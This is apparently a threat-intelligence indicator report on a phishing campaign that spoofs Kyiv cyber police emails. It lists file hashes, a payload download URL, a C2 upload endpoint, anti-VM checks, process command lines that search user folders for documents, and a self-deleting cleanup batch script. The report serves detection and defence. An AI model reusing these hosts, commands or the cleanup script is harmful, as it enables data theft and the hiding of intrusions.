Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #Autoit #DLL #TA471 #uploader
- https://pastebin.com/rYsMt3vH
- previous_contact:
- 24/07/21 https://pastebin.com/qHHUgBNK
- 12/04/21 https://pastebin.com/yBpP4PPw
- FAQ:
- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_083
- attack_vector
- --------------
- email > attach .rar > pdf.cpl (DLL) > GET stun.site/zepok101.exe > Users\Public\svchosts.exe > exfil to 185.244.41.109
- email_headers
- --------------
- List-Id: <tobnosimey.outlook.com>
- From: Управління протидії кіберзлочинам в місті Києві <police387@npu.gov.ua> <tobnosimey@outlook.com>
- Subject: re: Повідомлення про підозру у порушенні закону
- Date: Fri, 17 Dec 2021 16:10:00 +0300
- Return-Path: tobnosimey@outlook.com
- X-OriginatorOrg: outlook.com
- files
- --------------
- SHA-256 ef6f02c41b4bad58fc1930d0ed00a5db1e122b89bc2782ba4dbdc785bc07dba0
- File name pdf - Приклад заповнення пояснювальної текст заповнюється вручну.rar [ RAR archive data ]
- File size 10.87 KB (11130 bytes)
- SHA-256 a318fbaddaa11df5edde620b4c45ff31316dcfadf085d0f862004c857be568d7
- File name pdf - Приклад заповнення пояснювальної текст заповнюється вручну.cpl [ Win32 DLL ]
- File size 10.50 KB (10752 bytes)
- SHA-256 7e1355e51eb9c38e006368de1ae80b268ffab6918237696474f50802e3d8a9c8
- File name zepok101.exe (svchosts.exe) [ PE32 executable for MS Windows (GUI) Intel 80386 32-bit ASProtect v1.23 RC1 ]
- File size 2.52 MB (2641264 bytes)
- SHA-256 6f3994ad6b418b55ba2a3cd4f4d8cff35284a5790ea3dd38f1abf8699410430a
- File name zepok101_unpack.bin [ PE32 executable for MS Windows (GUI) Intel 80386 32-bit ]
- File size 4.93 MB (5169152 bytes)
- activity
- **************
- PL_SCR https://stun.site/zepok101.exe ( 37.9.13.206:443 )
- C2 185.244.41.109:8080/upld/
- Anti-VM
- **************
- + Detects Sandboxie through the presence of a library
- + Checks the version of Bios, possibly for anti-virtualization [\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion]
- + Detects VirtualBox through the presence of a registry key [ HKLM\HARDWARE\ACPI\DSDT\VBOX__ ]
- netwrk
- --------------
- 185.244.41.109:8080 POST /upld/AC38D1C7 HTTP/1.1 (application/upload) Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- comp
- --------------
- rundll32.exe 2672 TCP 37.9.13.206 443 ESTABLISHED
- svchosts.exe 2720 TCP 185.244.41.109 8080 ESTABLISHED
- proc
- --------------
- "C:\Windows\System32\control.exe" "C:\Users\operator\Desktop\pdf_DLL.cpl",
- "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\operator\Desktop\pdf_DLL.cpl",
- C:\Users\Public\svchosts.exe
- C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.csv" /S /B /A
- C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.doc" /S /B /A
- C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.pdf" /S /B /A
- ...
- C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.7z" /S /B /A
- C:\Windows\system32\cmd.exe cmd /c start /min r.bat
- C:\Windows\system32\cmd.exe /K r.bat
- C:\Windows\SysWOW64\cmd.exe /min /c del "C:\Users\Public\r.bat"
- C:\Windows\SysWOW64\taskkill.exe /IM cmd.exe /F
- persist
- --------------
- n/a
- drop
- --------------
- C:\Users\Public\svchosts.exe
- C:\Users\Public\r.bat
- r.bat
- --------------
- @echo off
- :tryrem
- del svchosts.exe
- if exist svchosts.exe (goto tryrem)
- start /b "" cmd /min /c del "%~f0"& Taskkill /IM cmd.exe /F&exit /b
- Files details
- --------------
- RAR https://www.virustotal.com/gui/file/ef6f02c41b4bad58fc1930d0ed00a5db1e122b89bc2782ba4dbdc785bc07dba0/details
- DLL https://www.virustotal.com/gui/file/a318fbaddaa11df5edde620b4c45ff31316dcfadf085d0f862004c857be568d7/details
- EXE https://www.virustotal.com/gui/file/7e1355e51eb9c38e006368de1ae80b268ffab6918237696474f50802e3d8a9c8/details
- EXE_unp https://www.virustotal.com/gui/file/6f3994ad6b418b55ba2a3cd4f4d8cff35284a5790ea3dd38f1abf8699410430a/details
- DLL https://www.unpac.me/results/89a184de-0712-4673-8238-f9ecd86c7362
- EXE https://www.unpac.me/results/40da648c-cf5e-4d13-ad39-5a42b087d945
- DLL https://analyze.intezer.com/analyses/159836bf-8ed5-4b6c-8ffa-e3c28f51f181
- EXE https://analyze.intezer.com/analyses/35f76754-f612-4306-924b-3f47cb862e83
- EXE_unp https://analyze.intezer.com/analyses/985987ff-81cb-4a88-b4a7-413f793c6744
- VR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement